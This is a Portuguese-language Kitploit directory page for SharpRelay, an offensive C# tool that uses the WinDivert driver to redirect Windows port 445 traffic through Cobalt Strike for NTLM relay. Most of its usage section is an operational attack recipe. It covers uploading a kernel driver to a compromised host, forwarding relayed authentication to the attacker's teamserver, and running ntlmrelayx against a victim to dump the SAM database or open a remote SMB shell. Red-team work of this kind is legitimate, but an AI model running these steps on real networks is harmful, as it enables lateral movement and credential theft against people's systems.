Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpRelay — Ferramenta em C# que utiliza o driver WinDivert para interceptar e redirecionar o tráfego da porta 445 do Windows para ataques de retransmissão NTLM via Cobalt Strike, possibilitando movimento lateral e coleta de credenciais em operações de red team. | Kitploit
Ferramentas/GitHubGitHub/pkb1s/sharprelay
Sniffing e Análise de PacotesMovimento LateralTestes de PenetraçãoRed Teaming
GitHubpkb1s/sharprelay

SharpRelay

Ferramenta em C# que utiliza o driver WinDivert para interceptar e redirecionar o tráfego da porta 445 do Windows para ataques de retransmissão NTLM via Cobalt Strike, possibilitando movimento lateral e coleta de credenciais em operações de red team.

Ver Repositório
17921há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Uso

O único requisito para que este ataque funcione é ter um beacon com privilégios de administrador local ou com a capacidade de carregar drivers. O ataque usando o SharpRelay funciona da seguinte forma:

  • Carregue o driver assinado do WinDivert em qualquer pasta do host comprometido
  • Execute o SharpRelay para modificar a porta de destino dos pacotes recebidos na porta 445 e redirecioná-los para outra porta (ex.: 8445)
  • A partir do nosso beacon, execute o comando rportfwd do Cobalt Strike para encaminhar a porta 8445 do host comprometido para a porta 445 do nosso teamserver
  • Inicie um servidor socks para encaminhar o tráfego retransmitido de volta para a rede da vítima
  • Execute o ntlmrelayx do Impacket com proxychains para fazer o relay SMB
  • Quando uma vítima tentar acessar a porta 445 do host comprometido, a autenticação NTLM será encaminhada para o nosso teamserver e retransmitida para outra máquina

Os seguintes comandos de exemplo podem ser executados a partir do Cobalt Strike para realizar essas ações:

root@kitploit:~
socks 4444
rportfwd 8445 127.0.0.1 445
cd C:\Users\victim
upload /root/Desktop/intercept.sys
execute-assembly /root/Desktop/SharpRelay.exe fakeservice C:\Users\victim\intercept.sys 445 8445

Quando todos os passos acima forem executados com sucesso, você precisa iniciar seu servidor de relay (configure o proxychains para a porta especificada nos comandos acima, ex.: 4444):

root@kitploit:~
proxychains ntlmrelayx.py -t smb://<VICTIM-IP> -smb2support

O comando acima irá extrair o banco de dados SAM do host da vítima. Também é possível obter um shell SMB interativo, bem como executar comandos remotamente na vítima.

O SharpRelay foi testado contra Windows 10 x64.

Instruções de Compilação

Se você deseja compilar a ferramenta a partir do código-fonte, siga os passos abaixo:

  • Clone o repositório
  • Certifique-se de que todos os pacotes NuGet estão visíveis na aba Instalada, abrindo Project->Manage NuGet Packages no Visual Studio
  • Compile o projeto

As instruções acima foram testadas usando o Visual Studio 2019.

Detalhes Técnicos

O SharpRelay é baseado no driver WinDivert. De acordo com sua descrição, o WinDivert é um driver de kernel que permite a interceptação e modificação de pacotes em modo de usuário. O usuário precisa especificar um filtro e qualquer pacote que corresponda a esse filtro será interceptado e pode ser modificado.

Do arquivo ReadMe:

root@kitploit:~
The WinDivert.sys driver is installed below the Windows network stack.  The
following actions occur:

(1) A new packet enters the network stack and is intercepted by WinDivert.sys
(2a) If the packet matches the PROGRAM-defined filter, it is diverted.  The
    PROGRAM can then read the packet using a call to WinDivertRecv().
(2b) If the packet does not match the filter, the packet continues as normal.
(3) PROGRAM either drops, modifies, or re-injects the packet.  PROGRAM can
    re-inject the (modified) using a call to WinDivertSend().

Para nós, a coisa mais importante que o WinDivert nos permite fazer é que podemos interceptar o tráfego destinado a uma porta aberta do Windows e redirecioná-lo para outra porta, modificando as portas de origem e destino TCP de cada pacote, recalculando as somas de verificação TCP e reinjetando os pacotes na pilha de rede.

No Windows, a porta 445 está sempre em execução por padrão. Não entrarei em detalhes sobre o processo usando a porta 445, pois isso já foi analisado no post a seguir, então vá em frente e leia:

  • https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

O post acima também contém outra ideia interessante. Usar o WinDivert para realizar um ataque de relay SMB via Metasploit. Você pode carregar alguns DLLs e um arquivo de driver no host alvo junto com o divertTCPconn.exe e executá-los. Achei esse ataque incrível, mas o que não gostei foi que você tinha que carregar múltiplos DLLs no host alvo.

Então meu objetivo era fazer o mesmo ataque, deixando o mínimo de arquivos no disco e também executando o ataque através do Cobalt Strike.

Primeiramente, eu queria fazer uso da função execute-assembly do Cobalt Strike, então decidi escrever meu código usando o framework .NET. Meu pensamento inicial era reescrever o divertTCPconn em C# e então tudo funcionaria. Acontece que isso era muito complicado. Felizmente, encontrei o seguinte pacote NuGet escrito por TechnikEmpire:

  • https://github.com/TechnikEmpire/WinDivertSharp

Usando o WinDivertSharp, consegui escrever o SharpRelay para carregar o driver criando um serviço e comunicar com o driver WinDivert para realizar qualquer modificação de pacote que eu precisasse.

Baixar ferramenta